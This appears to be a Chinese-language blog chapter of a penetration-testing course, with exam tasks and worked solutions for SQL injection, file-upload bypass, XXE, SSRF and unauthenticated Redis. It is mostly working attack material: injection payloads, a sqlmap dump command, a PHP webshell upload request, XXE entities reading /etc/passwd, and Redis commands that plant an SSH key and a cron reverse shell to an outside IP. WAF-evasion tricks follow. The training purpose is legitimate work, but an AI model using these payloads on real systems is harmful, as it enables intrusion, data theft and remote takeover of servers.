课程与考核

发布于:2025-05-21 ⋅ 阅读:(16) ⋅ 点赞:(0)
6.1 课程讲解与实战考核

6.1.1 SQL注入篇考核

考核目标:通过手动注入与工具结合,获取目标数据库敏感信息。

题目示例

  • 目标URL:http://vuln-site.com/product?id=1

  • 要求:

  1. 判断注入类型(联合查询/报错注入/布尔盲注)。

  2. 获取数据库名称、表名及用户密码字段。

  3. 使用Sqlmap自动化验证结果。

解题思路

  1. 探测注入点

http://vuln-site.com/product?id=1' AND 1=1-- // 正常响应 

http://vuln-site.com/product?id=1' AND 1=2-- // 异常响应 

  1. 联合查询注入

' ORDER BY 3-- // 确定字段数为3 

' UNION SELECT 1,2,database()-- 

  1. Sqlmap自动化

sqlmap -u "http://vuln-site.com/product?id=1" --risk=3 --level=5 --dump 


6.1.2 文件上传绕过考核

考核目标:绕过黑名单校验上传Webshell。

题目场景

  • 网站仅允许上传.jpg文件,且检测文件头与Content-Type。

  • 目标:上传PHP Webshell并触发执行。

绕过步骤

  1. 文件头伪造:在Webshell开头添加GIF89a

  2. 双扩展名绕过:命名文件为shell.jpg.php

  3. Burp修改Content-Type


POST /upload.php HTTP/1.1 

Content-Type: multipart/form-data 

Content-Disposition: form-data; name="file"; filename="shell.jpg" 

Content-Type: image/jpeg 

<?php system($_GET['cmd']); ?> 


6.1.3 XXE与SSRF实战考核

考核目标:利用XXE读取服务器文件,并通过SSRF攻击内网服务。

题目环境

  • 目标接口:XML数据解析端点(/api/parse)。

  • 内网存在未授权Redis服务(192.168.1.100:6379)。

解题步骤

  1. XXE读取/etc/passwd

<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> 

<data>&xxe;</data> 

  1. SSRF探测内网Redis

<!DOCTYPE test [<!ENTITY ssrf SYSTEM "http://192.168.1.100:6379">]> 

  1. Redis未授权写SSH密钥

redis-cli -h 192.168.1.100 flushall 

echo -e "\n\nssh-rsa AAAAB3NzaC... user@kali" | redis-cli -h 192.168.1.100 -x set payload 

redis-cli -h 192.168.1.100 config set dir /root/.ssh 

redis-cli -h 192.168.1.100 config set dbfilename "authorized_keys" 

redis-cli -h 192.168.1.100 save 


6.2 扩展知识与高阶技巧

6.2.1 常见WAF绕过技巧

  • 分块传输编码

POST /login.php HTTP/1.1 

Transfer-Encoding: chunked 

7\r\n 

user=ad\r\n 

6\r\n 

min&pass=1\r\n 

0\r\n 

  • 注释符混淆

' UN/**/ION SEL/**/ECT 1,2,3-- 

6.2.2 未授权漏洞实战(Redis)

攻击链

  1. 发现Redis未授权访问:nmap -p 6379 192.168.1.0/24

  2. 写入定时任务反弹Shell:


redis-cli -h 192.168.1.100 

config set dir /var/spool/cron 

config set dbfilename root 

set payload "* * * * * bash -i >& /dev/tcp/1.2.3.4/4444 0>&1" 

save 


6.3 考核评分标准
  • 基础分(60%):完成漏洞利用的核心步骤(如注入成功、文件上传、权限获取)。

  • 进阶分(30%):绕过防御机制(如WAF、加密参数)。

  • 创新分(10%):提出新颖攻击链或自动化脚本(如结合多个漏洞横向移动)。


模拟考核环境搭建指南

  1. Docker快速部署漏洞靶场

docker run -d -p 80:80 vulnerables/web-dvwa 

  1. Kali工具集成:预装Sqlmap、Burp Suite、CobaltStrike。

  2. 日志监控:使用ELK堆栈记录攻击行为,用于事后复盘。


下期预告

终章:综合实战演练——从信息收集到内网渗透,还原真实红队攻击全流程!